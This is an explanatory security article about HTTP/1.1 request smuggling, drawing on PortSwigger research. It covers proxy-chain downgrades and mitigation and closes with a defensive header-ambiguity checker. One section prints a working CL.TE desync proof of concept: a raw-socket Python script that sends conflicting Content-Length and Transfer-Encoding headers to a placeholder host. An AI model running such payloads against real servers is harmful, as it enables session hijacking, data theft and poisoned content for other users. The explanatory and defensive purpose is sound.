- A single manipulated packet can cause a website to mix up user sessions, leak confidential info, or serve poisoned content that infects everyone who visits.
- After two decades of attempted patches, the protocol remains fundamentally unsafe whenever proxies or shared connections are involved.
- Until full HTTP/2 support arrives everywhere, organisations need to aggressively sanitise incoming requests and routinely scan for lurking vulnerabilities.
Just because a website uses shiny new security badges on the surface doesn't mean it's locked up tight behind the scenes.
Recent research has unveiled a worrying reality under the hood: millions of websites, even those behind cutting-edge proxies and cloud platforms, are silently backsliding to the outdated HTTP/1.1 protocol somewhere along the request chain. This isn't just a touch of technical debt; it's a cybercriminal's dream come true.
How traffic flows
When you click on a website in 2025, your request doesn't go straight to its destination. It bounces around: from your browser, through content delivery networks, load balancers, and proxies, before finally hitting the website's back-end servers.
If any single component along this relay only speaks the old HTTP/1.1, the security of the entire chain can be undermined.
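You can check the client-facing half of that negotiation yourself. Here is a minimal sketch using the Python httpx library (the URL is a placeholder); note it only reveals the protocol on your own hop, not what a CDN speaks to the origin behind it:

```python
# pip install httpx[http2]  -- HTTP/2 support needs the optional extra
import httpx

# Placeholder target; substitute a site you are authorised to probe.
URL = "https://example.com/"

with httpx.Client(http2=True) as client:
    resp = client.get(URL)
    # Reports the protocol negotiated on the client-facing hop only,
    # e.g. "HTTP/2" or "HTTP/1.1". A CDN may still downgrade to
    # HTTP/1.1 on its hop to the origin, which this cannot see.
    print(resp.http_version)
```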
PortSwigger, the well-known application security firm, threw a spotlight on this issue. They found that over 24 million websites, even big corporate ones, still downgrade requests to HTTP/1.1 despite advertising modern security up front. This isn't just nostalgia for the early 2000s; it's a recipe for disaster.
The fatal flaw: Request smuggling
So, what makes HTTP/1.1 so risky? In a word: ambiguity. The protocol simply lumps requests together on a TCP connection, with multiple ways to specify where one ends and the next begins. That means hackers can trigger so-called “request smuggling” attacks, slipping malicious requests between legitimate ones.
Suddenly, servers have no idea which data belongs to which user: a perfect opening for session hijacking, data theft, or worse.
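To see where the ambiguity comes from, here is a sketch of the two framing mechanisms HTTP/1.1 permits, written out as Python byte strings (the host name is hypothetical):

```python
# Two legal ways for an HTTP/1.1 message to say where its body ends.

# 1. Content-Length: the body is exactly N bytes long.
content_length_framed = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b"q=handbags!"          # exactly 11 bytes
)

# 2. Transfer-Encoding: chunked: each chunk announces its own size
#    in hex, and a zero-length chunk marks the end of the body.
chunked_framed = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"b\r\n"                # 0xb = 11 bytes follow
    b"q=handbags!\r\n"
    b"0\r\n\r\n"            # terminating chunk
)
```

Both forms are valid on their own; trouble starts when a single message carries both markers and two servers in the chain pick different ones.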
Cybersecurity researcher James Kettle, from PortSwigger, revealed all this at Black Hat USA and DEF CON, earning hefty bug bounty rewards in the process. The flaw is so severe that a single manipulated packet can cause a website to mix up user sessions, leak confidential info, or serve poisoned content that infects everyone who visits.
Just imagine: logging in to your favourite online store and landing in another customer's account instead, or having every page you load laced with credit card-stealing code.
Why are we still using HTTP/1.1?
Alarmingly, the inertia isn't confined to small-time web hosts. Major cloud service providers like Google and Cloudflare still default to HTTP/1.1 internally unless admins painstakingly reconfigure every layer.
The industry's mainstay front-ends (Nginx, Akamai, Fastly, CloudFront) often lack full upstream HTTP/2 support, making upgrades a real challenge.
Website operators can't just flip a magic switch and hope for safety. Every component in the chain, from CDN to app server, must support the newer protocols and be configured to reject risky, ambiguous requests. That's rarely the default, and it requires technical finesse that many organisations lack.
This isn't theory: attackers have already shown how devastating these flaws can be. Security researchers demonstrated successful request smuggling hacks against giants like PayPal, exposing unencrypted passwords and collecting bug bounties for their trouble.
The ease with which such bugs can be exploited is alarming: all it takes is a tiny inconsistency between how two servers interpret an HTTP request.
For example, if a request carries both a “Content-Length” header and a “Transfer-Encoding: chunked” header, different parts of the server chain might read the body differently.
An attacker can send a payload that one server thinks is complete while another server keeps reading. The result? A malicious request fragment gets silently attached to a victim's request.
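Putting those pieces together, here is a minimal sketch of that classic “CL.TE” desync over a raw socket. The host is hypothetical and plain HTTP is used for brevity (real targets sit behind TLS); only ever probe systems you are authorised to test:

```python
import socket

# Hypothetical vulnerable site, for illustration only.
HOST = "vulnerable.example"

# The front-end trusts Content-Length (13 bytes: "0\r\n\r\nSMUGGLED"),
# so it forwards everything below as ONE complete request.
# The back-end trusts Transfer-Encoding, sees the terminating "0"
# chunk, and leaves "SMUGGLED" on the connection as the START of the
# NEXT request -- which gets glued onto another user's traffic.
payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 13\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"SMUGGLED"
)

with socket.create_connection((HOST, 80)) as sock:
    sock.sendall(payload)
    print(sock.recv(4096).decode(errors="replace"))
```

In a real attack, those leftover "SMUGGLED" bytes would be the opening of a complete rogue request rather than a harmless marker.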
Can we fix HTTP/1.1?
Not really, says Kettle. After two decades of attempted patches, the protocol remains fundamentally unsafe whenever proxies or shared connections are involved. “If we want a secure web, HTTP/1.1 must die,” he warns.
While it's still reasonably safe for direct client-to-server connections, the web is rarely that simple nowadays.
Until full HTTP/2 support arrives everywhere, organisations need to aggressively sanitise incoming requests and routinely scan for lurking vulnerabilities.
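In practice, that sanitisation can be as blunt as refusing any request that signals its body length in more than one way. A minimal sketch, assuming headers arrive as raw (name, value) pairs (the function name and format are illustrative, not any particular proxy's API):

```python
def is_ambiguous(headers: list[tuple[str, str]]) -> bool:
    """Flag requests whose body length could be parsed two ways.

    `headers` is assumed to be a list of (name, value) pairs as
    received on the wire, before any normalisation.
    """
    names = [name.lower() for name, _ in headers]

    # Both framing mechanisms at once is the classic smuggling setup:
    # safest to reject outright rather than guess which one wins.
    if "content-length" in names and "transfer-encoding" in names:
        return True

    # Duplicate or non-numeric Content-Length values are ambiguous too.
    lengths = [v.strip() for n, v in headers
               if n.lower() == "content-length"]
    if len(lengths) > 1 or any(not v.isdigit() for v in lengths):
        return True

    return False


# Example: the CL.TE request above would be rejected at the front door.
assert is_ambiguous([("Content-Length", "13"),
                     ("Transfer-Encoding", "chunked")])
```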
PortSwigger's latest HTTP Request Smuggler tool even automates the search for hidden flaws, but that's just playing catch-up.
No matter how pretty a website looks or how many security logos it displays, it could still be vulnerable deep in its infrastructure. Any delay just gives hackers more opportunities to slip through the cracks.